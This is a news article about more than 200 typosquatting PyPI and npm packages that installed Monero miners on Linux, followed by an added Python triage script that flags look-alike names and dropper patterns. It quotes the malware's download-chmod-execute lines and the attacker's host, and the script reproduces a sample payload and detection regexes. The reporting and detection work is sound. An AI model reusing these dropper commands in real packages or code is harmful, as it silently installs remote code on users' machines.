Researchers have again found malware in the PyPI and npm repositories. This time more than 200 packages relied on typosquatting and carried cryptocurrency miners targeting Linux systems.
The problem was first noticed by independent security researcher Hauke Lubbers, who found “at least 33 packages” on PyPI that ran the XMRig miner, which mines the Monero cryptocurrency. They were distributed by typosquatting: the malicious package gets installed when a user mistypes the name of a real, popular package (since developers usually install packages from the terminal, typos are common). The malicious packages imitated React, argparse and AIOHTTP, for example.
While Lubbers was notifying the PyPI administrators of his discovery, the same attacker began publishing another set of 22 packages with the same payload.
The researcher says that all packages were targeted at Linux systems and contained a code fragment that downloaded a Bash script from the attacker’s server via the Bit.ly URL shortening service:
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
Lubbers explains that the URL on bit.ly points to a script hosted at 80.78.25[.]140:8000. Once executed, this script notifies its operator of the IP address of the compromised host and the successful deployment of the miner.
“I found these packages through my side project, which I call the Package Observatory Club,” Lubbers told Bleeping Computer. “It queries and saves metadata about all new packages uploaded to PyPI and RubyGems.org and then uses some heuristics. If a package looks suspicious, it alerts me and I take a look. Most of the time I get false positives, but PyPI has had a particularly large amount of typosquatting in the last week.”
Lubbers explains that he is doing this because “the cybersecurity community has a lot that comes from the open source ecosystem,” and he considers it his duty to pay back something for it:
“Whether it’s searching for vulnerabilities, helping to protect against intruders, or direct contributions. We must understand that most of the work of the package repositories rests on a small handful of volunteers,” says the expert.
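As an added illustration (not code from the article, from Lubbers, or from the Package Observatory Club, whose actual rules are not published here), the following Python script combines the two signals described above into a simple triage check for a newly uploaded package: a name-similarity test against a list of popular package names, and a scan of the package source for the download-and-execute pattern seen in the quoted snippet (shell execution, a fetch through a URL shortener or from a raw IP address, chmod, a hidden dotfile, sudo, piping to a shell). The popular-package list, the indicator names, the thresholds and both sample inputs are constructed assumptions for this example; the shortener path in the malicious sample is a placeholder, not the real link.

```python
import re
from difflib import SequenceMatcher

# Constructed allow-list of popular names (assumption); a real monitor would
# pull download statistics from the registry instead.
POPULAR_PACKAGES = ["react", "argparse", "aiohttp", "requests", "numpy"]

# Heuristics chosen for this example, not the Package Observatory Club's rules.
SHORTENER_DOMAINS = ("bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd")
SYSTEM_RE = re.compile(r"\b(?:os\.system|os\.popen|subprocess\.(?:call|run|Popen))\s*\(")
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\b[^\n]*?https?://([^\s/\"']+)", re.I)
RAW_IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b")
DOTFILE_RE = re.compile(r"\./\.[\w.-]+")          # e.g. ./.cmc
PIPE_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
SUDO_RE = re.compile(r"\bsudo\b")


def normalize(name: str) -> str:
    """PyPI treats '-', '_' and '.' as equivalent and names as case-insensitive."""
    return re.sub(r"[-_.]+", "-", name).lower()


def typosquat_candidates(name, popular=POPULAR_PACKAGES, threshold=0.8):
    """Popular names that `name` closely resembles without matching exactly."""
    n = normalize(name)
    hits = []
    for p in popular:
        pn = normalize(p)
        if n == pn:
            continue  # the genuine package, not a squat of it
        ratio = SequenceMatcher(None, n, pn).ratio()
        if ratio >= threshold:
            hits.append((p, round(ratio, 2)))
    return hits


def payload_indicators(source: str) -> list:
    """Sorted indicator names found in package source (setup.py, install hooks)."""
    found = set()
    if SYSTEM_RE.search(source):
        found.add("shell-command-execution")
    for m in DOWNLOAD_RE.finditer(source):
        found.add("remote-download")
        host = m.group(1).lower().split(":")[0]  # drop an explicit port
        if any(host == d or host.endswith("." + d) for d in SHORTENER_DOMAINS):
            found.add("url-shortener")
        if RAW_IP_RE.match(host):
            found.add("raw-ip-host")
    if CHMOD_RE.search(source):
        found.add("chmod-executable")
    if DOTFILE_RE.search(source):
        found.add("hidden-dotfile")
    if PIPE_SHELL_RE.search(source):
        found.add("pipe-to-shell")
    if SUDO_RE.search(source):
        found.add("sudo")
    return sorted(found)


def assess_package(name: str, source: str) -> dict:
    """Combine both signals: a look-alike name plus a dropper pattern is the
    combination the article describes; either one alone only merits review."""
    squats = typosquat_candidates(name)
    indicators = payload_indicators(source)
    if squats and indicators:
        verdict = "suspicious"
    elif squats or indicators:
        verdict = "review"
    else:
        verdict = "clean"
    return {"name": name, "typosquat_of": squats,
            "indicators": indicators, "verdict": verdict}


# Constructed sample mirroring the structure of the snippet quoted in the
# article; the shortener path is a placeholder, not the real link.
MALICIOUS_SAMPLE = '''import os
os.system("sudo wget https://bit.ly/PLACEHOLDER -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
'''

# Constructed benign setup script for comparison.
BENIGN_SAMPLE = '''from setuptools import setup
setup(name="aiohttp", version="1.0.0", packages=["aiohttp"])
'''

if __name__ == "__main__":
    for pkg, src in (("aiohtpp", MALICIOUS_SAMPLE), ("aiohttp", BENIGN_SAMPLE)):
        print(assess_package(pkg, src))
```

The name check skips exact matches on purpose: a package that is literally called `aiohttp` is the genuine one (or a registry-level impersonation that name similarity cannot catch), so only near-misses are reported. Static string matching like this is a cheap first filter for a queue of new uploads; it will miss obfuscated droppers, which is why such tooling feeds a human review step rather than an automated takedown.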
At almost the same time, analysts at Sonatype discovered another 186 malicious packages on npm that fetched the malicious Bash script from the same URL.
Fortunately, both repositories quickly removed the typosquatting malware from their platforms, and the malicious packages were unlikely to have caused much harm to developers.